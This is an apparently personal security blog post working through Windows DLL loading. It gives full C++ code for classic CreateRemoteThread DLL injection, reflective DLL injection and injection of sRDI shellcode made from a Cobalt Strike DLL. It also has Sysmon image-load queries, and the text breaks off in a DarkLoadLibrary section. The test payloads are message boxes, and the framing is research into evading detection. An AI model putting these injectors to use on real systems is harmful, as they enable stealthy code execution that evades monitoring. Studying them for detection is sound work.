Exploring DLL Loads, Links, and Execution

This is an archive post back from 2021, I have since revisited it (TBD) ⚠

Introduction

Right, so, this is a bit of a long one. But I want to go over a few methods of loading DLLs into processes. Then build onto that and look into Reflective DLLs, some SysMon events associated with loading DLLs, and finally DarkLoadLibrary which could be a great alternative to bootstrapping DLLs.

Before we get into loading DLLs, the following statement is from Microsoft, in the What is a DLL article:

For the Windows operating systems, much of the functionality of the operating system is provided by DLL. Additionally, when you run a program on one of these Windows operating systems, much of the functionality of the program may be provided by DLLs. For example, some programs may contain many different modules, and each module of the program is contained and distributed in DLLs.

The use of DLLs helps promote modularization of code, code reuse, efficient memory usage, and reduced disk space. So, the operating system and the programs load faster, run faster, and take less disk space on the computer.

Essentially, a DLL, or a Dynamic-Link Library, are libraries that contain various pieces of data and provide a modular approach to code. When we use a function like LoadLibraryA, we're pulling that from kernel32.dll:

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          4AC6099C86B3039356359A7D31026BF056872EBBF8A8E551A1115919E54FB772       C:\Windows\system32\kernel32.dll

Thinking about this offensively, it makes sense that DLLs being loaded into processes could be a great way to execute arbitrary code.

Loading A DLL from Disk

Lets take a look at a programatic way of loading a given DLL into a process when that DLL is on the same disk as the executable.

The DLL that will be used for debugging:

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
        MessageBoxA(nullptr, "DLL_THREAD_ATTACH", "DLL_THREAD_ATTACH", MB_OK);
        break;
    case DLL_THREAD_DETACH:
        MessageBoxA(nullptr, "DLL_THREAD_DETACH", "DLL_THREAD_DETACH", MB_OK);
        break;
    case DLL_PROCESS_DETACH:
        MessageBoxA(nullptr, "DLL_PROCESS_DETACH", "DLL_PROCESS_DETACH", MB_OK);
        break;
    }
    return TRUE;
}

Depending on the way the DLL is loaded, it will throw a MessageBoxA telling us which method of attachment was used.

This could even be a one-liner:

#include <stdio.h>
#include <windows.h>

int main()
{
    LPCSTR path = "..\\Release\\debug-dll.dll";

    printf("%p\n", LoadLibraryA(path));

    return 0;
}

Running this:

All thats happended here is that LoadLibraryA has been called on our debug-dll.dll from earlier. Here is a quick description on LoadLibraryA:

LoadLibrary can be used to load a library module into the address space of the process and return a handle that can be used in GetProcAddress to get the address of a DLL function. LoadLibrary can also be used to load other executable modules. For example, the function can specify an .exe file to get a handle that can be used in FindResource or LoadResource. However, do not use LoadLibrary to run an .exe file. Instead, use the CreateProcess function.

If we look up the loader in Process Hacker, we can see the DLL has been linked to the Process Execution Block (PEB):

This one is a bit more complicated as it requires us to do a bit of process injection. I discussed DLL Injection in-depth in Process Injection Part 1: The Theory, so I won't go into detail here. But, essentially what is happening in the following code is a sacrificial process is being created with CreateProcessA and then a given DLL is being injected. This just means that we will create a process, then inject the DLL into memory and have it load there.

The code:

void remote_load_dll(LPCSTR path)
{
    LPSTARTUPINFOA si = new STARTUPINFOA();
    PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    if (CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi) == NULL)
    {
        printf("[!] Failed to create process!\n");
        return;
    }
    else
    {
        printf("  :: Process ID: %d\n", pi->dwProcessId);
        printf("  :: Process Handle: %p\n", pi->hProcess);

        int len = strlen(path);

        LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        printf("  :: Base Address: %p\n", pAddress);
        WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
        PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
        printf("  :: THREAD_START_ROUTINE: %p\n", pRoutine);
        HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
        printf("  :: Thread: %p\n", hThread);
        if (pi->hProcess)CloseHandle(pi->hProcess);
        if (pi->hThread)CloseHandle(pi->hThread);
        if (hThread)CloseHandle(hThread);
    }
}

Process ID 16684 was created and injected into, loading the MessageBoxA DLL:

The issue we have here is that the DLL is being loaded from disk meaning that, in an offensive scenario, the malicious DLL will have to be written to the targets disk:

int len = strlen(path);
LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);

The debug-dll.dll can also be seen in the linked modules:

Lets look at a way of removing the requirement for on-disk DLLs to reduce the chance of being so obvious.

Reflective DLL

This is where Reflective DLLs come into it. Reflective DLLs allow for DLLs to be loaded entirely from memory. A good introduction to Reflective DLLs can be seen in What is Reflective DLL Injection and how can be detected?.

This technique was originally written by Stephen Fewer and the original code can be found in stephenfewer/ReflectiveDLLInjection. The repository provided by Stephen Fewer goes over how this technique works quite well:

  1. Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.

  2. As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.

  3. The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.

  4. The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.

  5. The library's headers and sections are loaded into their new locations in memory.

  6. The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.

  7. The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.

  8. The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.

  9. Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.

The exported function can be seen on line 49 and will be an indicator that we will look at later on. Additionally, the entirety of the ReflectiveLoader.c is very well commented. So, between the technique explanation, and the code comments, I won't describe everything it is doing.

Lets write something malicious to demonstrate a the Reflective DLL process.

First off, the actual DLL. This is very similar to the debug-dll.dll from earlier, in that it will throw a MessageBoxA. The example that will follow is practically identical to ReflectiveDll.c provided by Stephen Fewer. Here is the code we will be working with:

#include "ReflectiveLoader.h"
#include <windows.h>

extern "C" HINSTANCE hAppInstance;
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    BOOL bReturnValue = TRUE;
    switch (dwReason)
    {
    case DLL_QUERY_HMODULE:
        if (lpReserved != NULL)
        {
            *(HMODULE*)lpReserved = hAppInstance;
        }
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return bReturnValue;
}

That is the DLL to be injected, so lets look at writing a tool to load this DLL into the target processes.

The Injector: Reflective Prerequisties

Before writing the actual injection mechanism, some utility functions are needed. I grabbed this via a brute-force/error-based development with the repository provided until I got the minimum functions required, which were these two:

#include <windows.h>
#include <stdio.h>

#define WIN_X64
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)

DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{    
    WORD wIndex                          = 0;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeaders         = NULL;
    
    pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

    pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

    if( dwRva < pSectionHeader[0].PointerToRawData )
        return dwRva;

    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
    {   
        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
    }
    
    return 0;
}

DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
    UINT_PTR uiBaseAddress   = 0;
    UINT_PTR uiExportDir     = 0;
    UINT_PTR uiNameArray     = 0;
    UINT_PTR uiAddressArray  = 0;
    UINT_PTR uiNameOrdinals  = 0;
    DWORD dwCounter          = 0;
#ifdef WIN_X64
    DWORD dwCompiledArch = 2;
#else
    // This will catch Win32 and WinRT.
    DWORD dwCompiledArch = 1;
#endif

    uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;

    // get the File Offset of the modules NT Header
    uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;

    // currenlty we can only process a PE file which is the same type as the one this fuction has  
    // been compiled as, due to various offset in the PE structures being defined at compile time.
    if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
    {
        if( dwCompiledArch != 1 )
            return 0;
    }
    else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
    {
        if( dwCompiledArch != 2 )
            return 0;
    }
    else
    {
        return 0;
    }

    // uiNameArray = the address of the modules export directory entry
    uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];

    // get the File Offset of the export directory
    uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );

    // get the File Offset for the array of name pointers
    uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );

    // get the File Offset for the array of addresses
    uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );

    // get the File Offset for the array of name ordinals
    uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );    

    // get a counter for the number of exported functions...
    dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;

    // loop through all the exported functions to find the ReflectiveLoader
    while( dwCounter-- )
    {
        char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));

        if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
        {
            // get the File Offset for the array of addresses
            uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );   
    
            // use the functions name ordinal as an index into the array of name pointers
            uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );

            // return the File Offset to the ReflectiveLoader() functions code...
            return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
        }
        // get the next exported function name
        uiNameArray += sizeof(DWORD);

        // get the next exported function name ordinal
        uiNameOrdinals += sizeof(WORD);
    }

    return 0;
}

Again, the code is very well commented. But the two functions:

Rva2Offset:

Convert the Relative Virtual Address (RVA) to an offset which can be used to find the entry-point later on.

GetReflectiveLoaderOffset:

Does what it says on the tin, looks for the Reflective Loaders offset with the Rva2Offset function.

With that done, lets look at getting a DLL into memory. At first, I did it the old xxd way but the DLL came out to be 90,000 bytes which was killing Visual Studio. So, I opted for a method of reading the bytes into an LPVOID which is basically the same format it would be in anyway!

DWORD ReadBytes(char* path, LPVOID* shellcode) {
    HANDLE hFile;
    DWORD  size, readAmount = 0;

    hFile = CreateFileA(path, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile != INVALID_HANDLE_VALUE) {
        size = GetFileSize(hFile, 0);
        *shellcode = malloc(size + 16);
        ReadFile(hFile, *shellcode, size, &readAmount, 0);
        CloseHandle(hFile);
    }
    return readAmount;
}

FYI, the dll size from xxd:

unsigned int reflective_debug_dll_dll_len = 93696;

The Injector: Local

For the most part, this is a completely bog-standard injection:

Here is the code:

int main(void)
{
    const char* path = "C:\\Users\\mez0\\Desktop\\reflective-dll-blog\\dll-shenanigans\\x64\\Release\\reflective-debug-dll.dll";
    LPVOID buf;
    DWORD bufSz = ReadBytes((char*)path, &buf);

    LPVOID pAddress = nullptr;
    BOOL bProtect;
    HANDLE hThread;
    DWORD lpflOldProtect = 0;
    DWORD dwLdrOffset = 0;

    pAddress = VirtualAlloc(0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlMoveMemory(pAddress, buf, bufSz);
    bProtect = VirtualProtect(pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
    dwLdrOffset = GetReflectiveLoaderOffset(buf);

    LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

    hThread = CreateThread(0, 0, lpStartAddress, 0, 0, 0);
    Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
    WaitForSingleObject(hThread, INFINITE);
}

Executing this:

There is one difference here, and it is the LPTHREAD_START_ROUTINE. Usually, it is just the base address as provided by VirtualAlloc. But this time it uses the GetReflectiveLoaderOffset function to determine the entry-point for the exported function.

The Injector: Remote

This next piece of code is a combination of the process injection from earlier, and the GetReflectiveLoaderOffset in the previous segment:

void remote_exec(DWORD bufSz, LPVOID buf)
{
    LPSTARTUPINFOA si = new STARTUPINFOA();
    PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    if (CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi) == NULL)
    {
        printf("[!] Failed to create process!\n");
        return;
    }
    else
    {
        printf("  :: Process ID: %d\n", pi->dwProcessId);
        printf("  :: Process Handle: %p\n", pi->hProcess);

        LPVOID pAddress = nullptr;
        BOOL bProtect;
        HANDLE hThread;
        DWORD lpflOldProtect = 0;
        DWORD dwLdrOffset = 0;

        pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
        bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
        dwLdrOffset = GetReflectiveLoaderOffset(buf);

        LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

        hThread = CreateRemoteThread(pi->hProcess, 0, 0, lpStartAddress, 0, 0, 0);
        WaitForSingleObject(hThread, 5000);

        if (pi->hProcess)CloseHandle(pi->hProcess);
        if (pi->hThread)CloseHandle(pi->hThread);
        if (hThread)CloseHandle(hThread);
    }
    return;
}

Executing this, notepad spawns and is injected into:

Investigating the loads

Now that we've looked at both a standard, and a reflective DLL. Lets inspect the loads. Below is a screenshot of the of the Reflective DLL being loaded from memory and no reflective-debug-dll.dll can be seen in the linked modules:

It makes sense, we're executing a DLL from a bootstrapped entry-point, meaning its not a traditional DLL. Well, does it comply with the expected Kernel Callbacks from the PsSetLoadImageNotifyRoutine function?

First off, startLogging.xml from cyb3rward0g is used as the configuration file for Sysmon. The event ID for this is 7, below is the relevant config segment:

<RuleGroup name="" groupRelation="or">
    <!-- Event ID 7 == Image Loaded. Log everything except -->
    <ImageLoad onmatch="exclude">
        <Image condition="image">chrome.exe</Image>
        <Image condition="image">vmtoolsd.exe</Image>
        <Image condition="image">Sysmon.exe</Image>
        <Image condition="image">mmc.exe</Image>
        <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image>
        <Image condition="is">C:\Windows\System32\taskeng.exe</Image>
        <Image condition="is">C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe</Image>
        <Image condition="is">C:\Program Files\Windows Defender\NisSrv.exe</Image>
        <Image condition="is">C:\Program Files\Windows Defender\MsMpEng.exe</Image>
        <Image condition="end with">onedrivesetup.exe</Image>
        <Image condition="end with">onedrive.exe</Image>
        <Image condition="end with">skypeapp.exe</Image>
        <Image condition="begin with">C:\Packages\Plugins\</Image> <!--Azure ARM Extensions -->
        <Image condition="begin with">C:\WindowsAzure\</Image> <!--Azure -->
    </ImageLoad>
</RuleGroup>

Generally, Get-WinEvent can be used to query Sysmon:

Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational"|where {$_.id -eq 7}

As we know that the on-disk loader loads DLLs as Windows expects, we can use that to verify if Sysmon is working as correctly. The screenshow below shows the on-disk-loader.exe loading debug-dll.dll into the current process (denoted by the 1):

A bunch of Image loaded events are found.

To look up the event in more detail, Event Viewer can be used by going to the follow path:

Applications and Services Logs -> Microsoft -> Windows -> Sysmon -> Operational

Then the events can be seen as such:

Or, here is a dirty little bit of PowerShell:

$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"

$loader = "on-disk-loader.exe"
$dll = "debug-dll.dll"

$Yesterday = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId ;StartTime = $Yesterday;}

$date = Get-Date -Format "yyyy-MM-dd HH"

foreach($event in $events)
{
    $msg = $event.Message.ToString()
    $image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
    $imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
    $utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
   
    if($image.contains($loader) -and $imageLoaded.Contains($dll))
    {
        Write-Host $image loaded $imageLoaded at $utcTime
    }
}

This will give something like:

Updating the script for the reflective DLL by changing the $loader to the in-mem-loader PE, and then $dll to reflective-debug-dll.dll:

$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"

$loader = "in-mem-loader.exe"
$dll = "reflective-debug-dll.dll"

$Yesterday = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId ;StartTime = $Yesterday;}

$date = Get-Date -Format "yyyy-MM-dd HH"

foreach($event in $events)
{
    $msg = $event.Message.ToString()
    $image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
    $imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
    $utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
   
    if($image.contains($loader) -and $imageLoaded.Contains($dll))
    {
        Write-Host $image loaded $imageLoaded at $utcTime
    }
}

Below is a screenshot of the Reflective DLL being loaded and the script not finding any events:

This makes sense as a DLL is not being loaded the traditional way, but it comes with some OpSec considerations.

x64dbg tangent

First thing I want to look at is the DLL in memory, loading it up in x64dbg and setting a breakpoint on VirtualAlloc, the RBP register shows the PE Magic bytes, MZ. Checking the base address VirtualAlloc returns matches up with the printed statement, and the RBP Register, following this into a dump, the full DOS Header can be seen:

Dumping the memory to disk:

Armed with a memory dump, we can load it up into PE-Bear and see that this is the valid Reflective DLL:

To sanity check myself, I compared the in-mem-loader to the dumped file to make sure I didn't do anything weird:

Tracking down the ReflectiveLoader export is easy enough in ReflectiveLoader.c:

DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME( VOID )

Where REFLDR_NAME is:

#define REFLDR_NAME ReflectiveLoader

Bit of a tangent, but cool nonetheless.

An Improved Reflective DLL

Something I wanted to quickly bring to light was an improved version of the Reflective DLL that was released by Dan Staples in An Improved Reflective DLL Injection Technique in 2015. Below is a quote from the blog which describes the main improvements made:

It does this by dynamically writing some bootstrap shellcode to the target process which loads the DLL (using LoadLibraryA) and then finds and calls another exported entry point function (using GetProcAddress). While this is a great improvement to traditional DLL injection, it is not reflective.

The new code can be found in dismantl/ImprovedReflectiveDLLInjection.

The article does a great job of detailing the improvements, so I won't repeat it here, but I just wanted to address those improvements have been made on this technique since it was initially identified.

Shellcode Reflective DLL Injection

Everything achieved so far has required access to the source code to compile the reflective loader component into it. To achieve that, a project called sRDI exists. sRDI – Shellcode Reflective DLL Injection was written to support the project and goes into detail on how the project works. But, essentially, it is this:

To quote the blog directly:

When execution starts at the top of the bootstrap, the general flow looks like this:

  1. Get current location in memory (Bootstrap)

  2. Calculate and setup registers (Bootstrap)

  3. Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)

  4. Un-pack DLL and remap sections (RDI)

  5. Call DLLMain (RDI)

  6. Call exported function by hashed name (RDI) – Optional

  7. Pass user-data to exported function (RDI) – Optional

As my DLL is huge, I'll use a Staged Cobalt Strike DLL. Below is the sRDI usage:

usage: ConvertToShellcode.py [-h] [-v] [-f FUNCTION_NAME] [-u USER_DATA] [-c] [-i] [-d IMPORT_DELAY] input_dll

RDI Shellcode Converter

positional arguments:
  input_dll             DLL to convert to shellcode

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -f FUNCTION_NAME, --function-name FUNCTION_NAME
                        The function to call after DllMain
  -u USER_DATA, --user-data USER_DATA
                        Data to pass to the target function
  -c, --clear-header    Clear the PE header on load
  -i, --obfuscate-imports
                        Randomize import dependency load order
  -d IMPORT_DELAY, --import-delay IMPORT_DELAY
                        Number of seconds to pause between loading imports

There are some really cool pieces of functionaliy here, so I recommend taking a look through ShellcodeRDI.py, but thats not in scope for now.

The Cobalt Strike DLL Entry is Start, and that can be verified by running something like this:

Running sRDI and specifying Start as the FUNCTION_NAME:

This can now be loaded into the injector as shown earlier. Again, for the sake of not crashing my Visual Studio, I'll just read the bytes into memory, as opposed to storing 20,000 bytes:

const char* path = "G:\\Dropbox\\artifact.bin";
LPVOID buf;
DWORD bufSz = ReadBytes((char*)path, &buf);

Because sRDI provides a bootstrap, none of the GetReflectiveLoaderOffset stuff is needed. Below is the injection code:

void remote_exec(DWORD bufSz, LPVOID buf)
{
    LPSTARTUPINFOA si = new STARTUPINFOA();
    PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    if (CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi) == NULL)
    {
        printf("[!] Failed to create process!\n");
        return;
    }
    else
    {
        printf("  :: Process ID: %d\n", pi->dwProcessId);
        printf("  :: Process Handle: %p\n", pi->hProcess);

        LPVOID pAddress = nullptr;
        BOOL bProtect;
        HANDLE hThread;
        DWORD lpflOldProtect = 0;
        DWORD dwLdrOffset = 0;

        pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        printf("  :: Base Address: %p\n", pAddress);

        WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
        printf("  :: Bytes Written!\n");

        bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
        printf("  :: Set PAGE_EXECUTE_READ\n");

        //dwLdrOffset = GetReflectiveLoaderOffset(buf);
        //printf("  :: Loader Offset: %zd\n", dwLdrOffset);
        //LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
        //printf("  :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);

        hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
        printf("  :: Thread: %p\n", hThread);

        WaitForSingleObject(hThread, 5000);

        if (pi->hProcess)CloseHandle(pi->hProcess);
        if (pi->hThread)CloseHandle(pi->hThread);
        if (hThread)CloseHandle(hThread);
    }
    return;
}

Note the commented out code:

//dwLdrOffset = GetReflectiveLoaderOffset(buf);
//printf("  :: Loader Offset: %zd\n", dwLdrOffset);
//LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
//printf("  :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);

And the thread is created normally:

hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);

Running this code shows notepad.exe being injected into and the DLL being executed:

Similarly to the Reflective DLL, no linked DLL is shown:

Recap

A few tangents later, what has actually occurred. So far:

  1. Looked at loading DLLs from disk and the associated kernel-callback (PsSetLoadImageNotifyRoutine), as well as the DLLs being linked to the PEB.

  2. Poked around some Reflective DLLs

  3. Looked at sRDI and created a little POC.

Moving on!

DarkLoadLibrary

A few weeks ago, batsec posted an excellent blog called Bypassing Image Load Kernel Callbacks on behalf of MDSec. This project looked at the kernel-callbacks associated with loading modules and linking them to the PEB.

What makes this interesting is the following table from the blog:

As long as I haven't misunderstood the library, this only works within the current process and doesn't support any kind of remote process interactions right out of the box, which is fine. We will work with that. According to the table, however, there's probably not any reason to avoid it, it does it all! Batsec goes on to discuss how this library is essentially the end product of rewriting the Windows library loader from scratch, so kudos to him.

A Quick Test

Below is the example provided:

#include <stdio.h>
#include <windows.h>

#include "pebutils.h"
#include "darkloadlibrary.h"

typedef DWORD (WINAPI * _ThisIsAFunction) (LPCWSTR);

VOID main()
{
    GETPROCESSHEAP pGetProcessHeap = (GETPROCESSHEAP)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "GetProcessHeap");
    HEAPFREE pHeapFree = (HEAPFREE)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "HeapFree");

    PDARKMODULE DarkModule = DarkLoadLibrary(
        LOAD_LOCAL_FILE,
        L"TestDLL.dll",
        NULL,
        0,
        NULL
    );

    if (!DarkModule->bSuccess)
    {
        printf("load failed: %S\n", DarkModule->ErrorMsg);
        pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg);
        pHeapFree(pGetProcessHeap(), 0, DarkModule);
        return;
    }

    _ThisIsAFunction ThisIsAFunction = (_ThisIsAFunction)GetFunctionAddress(
        (HMODULE)DarkModule->ModuleBase,
        "CallThisFunction"
    );
    pHeapFree(pGetProcessHeap(), 0, DarkModule);

    if (!ThisIsAFunction)
    {
        printf("failed to find it\n");
        return;
    }

    ThisIsAFunction(L"this is working!!!");

    return;
}

It loads TestDLL.dll and calls ThisIsAFunction. Simples.

Some messing about later, I ended up with a small PE that uses both the load options. First off though, the in memory replicator (read it from a file and store in a buffer):

DWORD read_bytes_from_file(LPCWSTR path, LPVOID* buf)
{
    HANDLE hFile;
    DWORD  size, readAmount = 0;

    hFile = CreateFileW(path, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile != INVALID_HANDLE_VALUE) {
        size = GetFileSize(hFile, 0);
        *buf = malloc(size + 16);
        BOOL bRead = ReadFile(hFile, *buf, size, &readAmount, 0);
        if (bRead == FALSE)
        {
            readAmount = 0;
        }
        CloseHandle(hFile);
    }
    return readAmount;
}

A standard wmain:

int wmain(int argc, wchar_t* argv[])
{
    LPCWSTR path;
    int mode = 0;

    if (argc == 3)
    {
        mode = atoi(argv[1]);
        path = argv[2];
    }
    else
    {
        printf("PS> .\\dark-loader.exe <mode> <path>\n");
        printf("PS> .\\dark-loader.exe 1 c:\\file.dll\n");
        printf("PS> .\\dark-loader.exe 2 c:\\file.dll\n");
        printf("\nMODES:\n");
        printf("    - 1: LOAD_LOCAL_FILE: Load a DLL from the file system.\n");
        printf("    - 2: LOAD_MEMORY: Load a DLL from a buffer.\n");
        return -1;
    }

    printf("|> Loading: %ws\n", path);

    local_load_dll(path, mode);

    return 0;
}

DarkLoadLibrary has two options:

  1. LOAD_LOCAL_FILE: Load a DLL from the file system.

  2. LOAD_MEMORY: Load a DLL from a buffer

Additionally, there is NO_LINK which we will look at later.

For the actual loading function, local_load_dll, we start with a switch to determine which control flag is used:

switch (mode)
{
case 1:
    printf("  :: Setting: LOAD_LOCAL_FILE\n");
    dwFlags = LOAD_LOCAL_FILE;
    break;
case 2:
    printf("  :: Setting: LOAD_MEMORY\n");
    dwFlags = LOAD_MEMORY;
    break;
}

Then, if the LOAD_MEMORY is to be used, some values need to be set:

if (mode == 2)
{
    printf("  :: Reading bytes (replicating in-memory loading)!\n");
    dwLen = read_bytes_from_file(lpwBuffer, &lpFileBuffer);
    lpwBuffer = NULL;
    lpwName = L"DarkLoadLibraryDebugging";
    if (dwLen > 0)
    {
        printf("  :: DLL Size: %ld\n", dwLen);
        printf("  :: Loading in as: %ws\n", lpwName);
    }
    else
    {
        printf("[!] Failed to load bytes from!");
        return;
    }
}

The magic bit:

GETPROCESSHEAP pGetProcessHeap = (GETPROCESSHEAP)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "GetProcessHeap");
HEAPFREE pHeapFree = (HEAPFREE)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "HeapFree");

